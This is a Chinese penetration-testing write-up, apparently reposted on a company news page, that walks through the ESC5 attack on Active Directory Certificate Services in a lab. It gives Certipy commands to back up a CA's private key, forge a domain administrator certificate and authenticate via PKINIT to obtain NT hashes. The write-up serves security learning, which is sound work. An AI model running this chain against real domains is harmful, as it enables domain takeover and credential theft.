尧图网站建设 尧图网络
  • 首页
  • 关于我们
  • 服务项目
  • 案例展示
  • 建站流程
  • 资讯中心
  • 联系我们
首页/资讯中心/详情

深入解析ESC5 ADCS配置漏洞利用——活动目录渗透测试实战

深入解析ESC5 ADCS配置漏洞利用——活动目录渗透测试实战
📅 发布时间:2026/6/20 15:22:53
本文详细解析了针对活动目录证书服务(ADCS)的ESC5攻击原理与实践,涵盖实验室环境搭建、利用本地管理员权限提取CA证书与私钥、伪造特权账户证书,以及最终通过PKINIT认证获取TGT票证的完整渗透测试流程。

摘要

继我之前写的ESC4文章之后——现在我的工作完成了,终于有更多时间学习,我想我也要深入研究一下ESC5。说实话,我不知道为什么,但学习活动目录(Active Directory)利用感觉起来更令人兴奋,尽管在印度尼西亚的真实环境中仍然相当罕见。可能只是我理想主义的一面吧,哈哈哈。好了,让我们开始一起学习吧。

什么是ESC5

ESC5是一种针对活动目录证书服务(ADCS)的攻击。这种攻击利用了对证书颁发机构(CA)的访问权限。如果攻击者获得了CA服务器上的本地管理员权限,就可以提取CA证书及其私钥。利用该私钥,攻击者可以为特权账户(如域管理员)伪造恶意证书。然后,这些伪造的证书可用于通过PKINIT向AD进行身份验证并请求TGT(票据授予票据)。

搭建实验室

创建一个任意名称的账户,并将该账户添加为CA服务器(DC01)上的本地管理员:

net localgroup Administrators "igniteraj" /add
net localgroup Administrators

(按回车或点击查看完整大小的图片)

枚举与利用

使用Certipy在CA服务器上以本地管理员账户枚举证书。
(按回车或点击查看完整大小的图片)
(按回车或点击查看完整大小的图片)

使用Certipy备份CA证书和私钥。

certipy ca -backup -u alex.doe@sandbox.local -p "MyPassword123" -ca ignite-DC-CA -target 10.100.150.10

伪造我们想要接管的账户——在本例中是administrator@sandbox.local,因为它是我的目标上的域管理员。

certipy forge -ca-pfx 'sandbox-ca.pfx' -upn administrator@sandbox.local

使用Certipy获取administrator@sandbox.local账户的NT哈希。

certipy auth -pfx administrator_forged.pfx -dc-ip 10.100.150.10

(按回车或点击查看完整大小的图片)
(按回车或点击查看完整大小的图片)

使用SecretDump导出哈希凭据。
(按回车或点击查看完整大小的图片)

参考资料

  • https://www.hackingarticles.in/ad-cs-esc5-vulnerable-pki-object-access-control/
  • https://mayfly277.github.io/posts/ADCS-part14/
  • https://www.vaadata.com/blog/ad-cs-security-understanding-and-exploiting-esc-techniques/
    CSD0tFqvECLokhw9aBeRqixLzx0482UkkKWM4rJX2T+9qXDLcUYQal3W1ykfQ9si0pulG6s9/0h/hW8d28k1SsX8sObhJabP00Qx1uju62JSdqgDv8XWiIQ1stSnFOlB/q2Fi82D6F6LlOrFptzcOg==
    更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
    对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

公众号二维码

公众号二维码

相关新闻

  • 10、网络安全漏洞利用与攻击技术详解
  • 在线招生宣传视频制作:内容优化与转化提升技巧
  • 《51测试天地》电子杂志 第八十七期发布文章:命令行参数的 3 种实战用法

最新新闻

  • LPC21xx/22xx I2C从机发送模式状态机编程实战指南
  • 基于NXP MCUXpresso SDK的FOC电机控制实战:从硬件选型到参数调谐
  • 高耐火极限甲乙级防火防盗门芯层隔热阻燃材料性能试验分析
  • 嵌入式GUI开发实战:emWin集成VNC服务器与触摸驱动校准详解
  • 嵌入式GUI性能优化实战:emWin内存管理与驱动配置深度解析
  • 使用Frame Distributor Wizard高效配置DPAA PCD,加速网络数据处理

日新闻

  • Visual C++运行库修复终极指南:5分钟快速解决Windows软件启动错误
  • 手把手教你构建统计局地区经济数据爬虫:从环境搭建到数据持久化全指南
  • 2026多Agent深度解析:用AI团队替代单一模型,四种架构实战落地

周新闻

  • Visual C++运行库修复终极指南:5分钟快速解决Windows软件启动错误
  • 手把手教你构建统计局地区经济数据爬虫:从环境搭建到数据持久化全指南
  • 2026多Agent深度解析:用AI团队替代单一模型,四种架构实战落地

月新闻

  • 【总结】入门篇:50句话让你记住架构核心概念
  • WeChatMsg技术方案解析:实现Mac微信数据自主管理的完整解决方案
  • WeChatMsg:革新性微信数据备份方案,打造你的专属数字记忆库

关于尧图

  • 公司简介
  • 团队介绍
  • 企业文化
  • 荣誉资质

服务项目

  • 定制开发
  • 电商建站
  • UI 设计
  • 运维服务

快速链接

  • 案例展示
  • 建站流程
  • 常见问题
  • 资讯中心

联系方式

  • 📍北京市朝阳区互联网产业园 A 座 10 层
  • 📞400-888-8888
  • ✉️contact@rkmt.cn
  • 🕐周一至周日 9:00-21:00

© 2024 北京尧图网络科技有限公司 版权所有 | 京 ICP 备 XXXXXXXX 号